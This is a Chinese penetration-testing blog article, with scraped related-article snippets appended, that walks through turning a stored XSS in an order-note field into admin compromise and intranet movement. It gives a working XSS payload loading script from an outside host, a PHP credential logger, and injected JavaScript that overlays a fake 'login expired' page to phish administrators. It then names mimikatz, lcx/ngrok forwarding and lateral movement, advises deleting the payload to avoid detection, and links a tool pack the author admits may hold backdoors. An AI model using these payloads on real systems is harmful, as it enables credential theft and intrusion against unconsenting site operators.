一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】
i春秋作家:jasonx
原文来自:一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】
前言
渗透过程中,有时候遇某些网站,明明检测到有xss漏洞,但是盲打以后,收到的cookie还是不能登录后台,大多数的原因都是因为对方的cookie关键参数开启了httponly,导致你获取到的cookie参数不全,所以没法登录。
今天和大家分享一次绕过httponly拿后台的思路。
0x01 遇到一个存在xss的站点
这个站点在提交订单的时候,下面有个订单备注输入框存在存储型xss。
我们直接插入插入xss代码;
</textarea>'"><script src=https://xx.cc/x/7Zbi58></script>

过了没多久拿到了cookie

但是我们尝试用cookie登录的时候失败了。

那么问题来了,如何才能拿到后台呢?
0x02 xss钓鱼拿下后台
因为xss平台已经收到后台的url地址了。
那么我们直接访问这个后台地址,然后右键查看源代码。

然后把所有代码复制到我们新建的一个html文件里面。
修改里面的代码,把所有相对路径的地方,全部改成绝对路径,(啥意思呢?请看下面分析。)
比如里面有的链接是这样的 /index.php
我们要修改成被钓鱼的域名加上/index.php
改完后应该是这样的 http://被钓鱼的域名.com/index.php

注意:所有相对路径链接部分都要改。
然后我们把action=这里修改成我们的1.php文件地址(源码在下面)<form action="http://www.我们的php域名.com/1.php" method="post" class="login-form">
1.php源码如下
<?php
$str='';
$str.='name:'.$_POST['name'].'|';
$str.='pwd:'.$_POST['pwd'].'|';
$str.='ip:'.$_SERVER["REMOTE_ADDR"].'|';
$str.='time:'.date("m-d-h:i");
file_put_contents('log.txt',$str.PHP_EOL, FILE_APPEND);
#下面这行的意思是记录完账号密码以后跳转到他原来的后台地址。
header("location:https://www.baidu.com/admin.php");
?>
注意:你的html文件里面的用户名和密码的参数名称要对应1.php的修改。
name=的这里,要和1.php的对应,要不然接收不到账号密码。

1.php的后面添加上被钓鱼方的后台首页地址,成功拿到密码以后会自动跳回他后台首页。
接下来我们把这个html文件和1.php放到网站空间,直接phpstudy搭建一个也可以的。
现在去xss平台新建一个项目
名称什么的随便输入,在自定义代码处输入以下代码。
把其中的url地址修改成你的html地址。
setTimeout(function(){
alert("登陆过期,请重新登陆!");
parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"https:\/\/我的钓鱼域名.com/index.html\" frameBorder=0 scrolling=no></iframe>");
setTimeout(function(){
document.getElementsByTagName("body")[0].setAttribute("style","margin:2px;");},100);
setTimeout(function(){
parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100);
},1500);
我们把得到的xss地址复制下来,插入到订单备注里面。
管理员看到我们的订单以后,1.5秒后就会自动弹出“登录过期,请重新登陆”的提示,并在url不改变的情况下,跳转到我们伪造的登录页面上去了。
接下来只要管理员输入了账号密码,并且提交,那么我们钓鱼服务器就收到账号密码啦,管理员那边也正常跳转到他的后台。

注意:拿到账号密码以后请迅速删掉你的xss项目,要不然管理员那边每一次浏览你的订单都会跳出这个登录页面,避免被发现。
另外实际操作的时候,你可以修改下代码,比如判断是否登录成功,或者修改延时等等,我这只是提供一个思路,抛砖引玉吧。
然后我们用拿到的账号密码登录后台,找上传点getshell。
拿到shell以后我们用 mimikatz(咪咪卡住)获取管理员密码。
然后通过ipconfig看到对方服务器在内网,所以我们需要转发端口出来,这里方法很多了,lcx转发 ngrok等等都可以的。
转发出来我们用获取到的密码直接登录服务器。
先收集一波内网信息。
net view 列出工作组下的计算机名称。
arp -a 查看arp缓存表。

然后就是横向怼了。
附上钓鱼的演示源码
链接: https://pan.baidu.com/s/1VrvYXLy4ozXN-8iR7Uj7rA 提取码: giu3
∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷ 华丽的分割线 ∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷
以上都不是重点,重点是我要放出自己用了多年的【渗透工具包】啦。
里面的很多工具都是一点点收集来的,因为都是来源于互联网,部分工具可能存在后门,请大家下载以后自行查杀,部分批量的工具过于敏感就不放出来啦。
声明:
工具是一把刀,既能切菜,也能伤人,我分享的初衷是便于大家做授权的渗透测试,所以请不要用于非法用途,否则一切后果自负。



阅读原文即可下载渗透工具包
一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】的更多相关文章
- 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网
/文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...
- CTF大赛模拟-CFS三层内网漫游
CTF大赛模拟-CFS三层内网漫游 环境: 三台虚拟机,三个网络. target 1:192.168.161.178 ,192.168.52.132 (linux) target 2:192.168. ...
- 【转载】SOCKS代理:从***到内网漫游
原文:SOCKS代理:从***到内网漫游 本文原创作者:tahf,本文属FreeBuf原创奖励计划,未经许可禁止转载 之前在Freebuf上学习过很多大牛写的关于Tunnel.SOCKS代理.***等 ...
- 内网漫游之SOCKS代理大结局
0×01 引言 在实际渗透过程中,我们成功入侵了目标服务器.接着我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口.内网网站8080端口等等.传统的方 ...
- 从SQL注入到内网漫游
前言 在一次渗透实战中,发现了一个注入点,最后成功的漫游了内网. 正文 在渗透中遇到一个站点,顺手测试了一下,在搜索框随便输入了一个字符加个单引号直接报错了,差不多可以确认这里存在注入了.一般这种站安 ...
- (转)Ubuntu 17.04_64上搭建巡风扫描系统(资产信息漏洞扫描内网神器)
巡风简介 巡风是一款适用于企业内网的漏洞快速应急.巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表.其主体分为两部分:网络资产识别 ...
- ssrf漏洞利用(内网探测、打redis)
摘要:存在ssrf漏洞的站点主要利用四个协议,分别是http.file.gopher.dict协议. file协议拿来进行本地文件的读取,http协议拿来进行内网的ip扫描.端口探测,如果探测到637 ...
- 一台PC双网卡,一个外网一个内网
问题:一台PC双网卡,一个连外网一个连内网.用户主要访问外网,内网只访问有限的几个ip.因为外网很大,一般人公司内网常访问的ip是有限的几个. 现在如何做到在上外网的同时也能访问内网的系统?明明两个网 ...
- xss实现获取内网ip
前提得浏览器支持webRTC,测试的时候google浏览器测试成功,火狐浏览器不支持webRTC, 再在xss平台直接复制如下js代码: function form_ip(ip,port){ var ...
随机推荐
- Spring 文件上传MultipartFile 执行流程分析
在了解Spring 文件上传执行流程之前,我们必须知道两点: 1.Spring 文件上传是基于common-fileUpload 组件的,所以,文件上传必须引入此包 2.Spring 文件上传需要在X ...
- 调皮的udp组播技术
2017年本科毕业,经历过千辛万苦的找工作之后,我进入了现在的这家公司.虽是职场小白,但励志成为IT界的一股清流(毕竟开发的妹子少,哈哈).因为公司的业务需要,我负责的部分是利用组播技术实现OSG模型 ...
- CentOS 7 建立svn仓库 远程连接
首先安装svn (后补) mikdir /usr/local/svn_repertory # 创建svn大仓库用于存放所有项目代码 cd /usr/local/svn_repertory # 进 ...
- pyadb关于python操作adb的资料
3.最后adb命令由于是android的原生操作命令,支持实现的功能非常多.这里举几个pyapp里实现的功能例子:获取,修改手机当前使用的输入法(adb shell ime list),获取当前手机界 ...
- python 数据可视化 -- 真实数据的噪声平滑处理
平滑数据噪声的一个简单朴素的做法是,对窗口(样本)求平均,然后仅仅绘制出给定窗口的平均值,而不是所有的数据点. import matplotlib.pyplot as plt import numpy ...
- 初识spark的MLP模型
初识Spark的MLP模型 1. MLP介绍 Multi-layer Perceptron(MLP),即多层感知器,是一个前馈式的.具有监督的人工神经网络结构.通过多层感知器可包含多个隐藏层,实现对非 ...
- SQL0419N 十进制除法运算无效,因为结果将有一个负小数位。 SQLSTATE=42911
select case when sum(qty_sold*u.um03/u.um08) <> 0 then decimal(coalesce(sum(d.amt_sold_with_ta ...
- Itreatot接口实现类中modCount的作用
modCount只有在本数据结构对应迭代器中才使用,以HashMap为例: private abstract class HashIterator implements Iterator { Entr ...
- 2-创建spring boot项目
想要创建一个spring boot项目,最好的方法就是参照官网的例子: https://spring.io/guides/gs/maven/#scratch 创建的过程我就不再啰嗦了,官网描述非常详细 ...
- Koa源码分析(三) -- middleware机制的实现
Abstract 本系列是关于Koa框架的文章,目前关注版本是Koa v1.主要分为以下几个方面: Koa源码分析(一) -- generator Koa源码分析(二) -- co的实现 Koa源码分 ...